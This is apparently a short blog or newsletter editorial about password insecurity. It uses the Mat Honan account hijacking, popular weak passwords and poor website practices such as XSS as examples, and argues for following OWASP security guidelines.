The age of the password is over; at least that's the conclusion reached by Mat Honan (the now-famous @mat on Twitter), after his well-publicized experience at the hands of hackers. In brief, they gained access to his Apple iCloud account, and used it to wipe his iPhone, iPad and MacBook devices. They then gained access to his linked Gmail and Twitter accounts. They even wrote to him on Twitter, and explained how the hack worked.
Of course, it doesn't help that many of us are lax in our choice of passwords, and share the same password across several accounts. According to results recently published by Gizmodo, based on an analysis of millions of stolen passwords posted online by hackers, "password" is still one of the most popular passwords. On the bright side, some are clearly starting to heed advice, with more complex variations such as "password1" gaining in popularity....
The problem is that while strong passwords – long, alphanumeric, with improbable character substitutions, and so on – are obviously safer, they are still not necessarily "safe". In the Honan case, the hackers got his details not by hacking his strong password, but by persuading Apple to reset the password over the phone (a practice they've now suspended), armed with his address and the last four digits of his credit card.
Likewise, there are countless examples of substandard security practices on the various websites with which we entrust our personal details. Over recent months, Troy Hunt has done an excellent job highlighting security issues he found with the Tesco's website, including passwords not hashed and encrypted in storage, passwords emailed in plain text, and lack of HTTPS. These failings afflict many websites. I'd particularly recommended you catch Troy's video demonstration of how easy it is on many sites to exploit Cross Site Scripting (XSS) vulnerabilities. This is where a hacker is able to inject JavaScript into a URL, on a legitimate website, to "sniff" information that the site stores in the cookies, or pop up an illegitimate logon form and capture username and password details.
So what's the answer? OWASP has provided excellent guidelines for making a site or service too difficult to hack to make it worthwhile, in the vast majority of cases. The Standards and best practices exist to avoid being hacked, but implementing them requires time and investment and often there simply doesn't seem to be the will to do it. We don't want to bother too hard with security and we wait for a "silver bullet" (such as biometric data, as suggested by Mat Honan) to rescue us from a tedious routine. Maybe a silver bullet isn't going to save us this time.
Cheers,
Tony.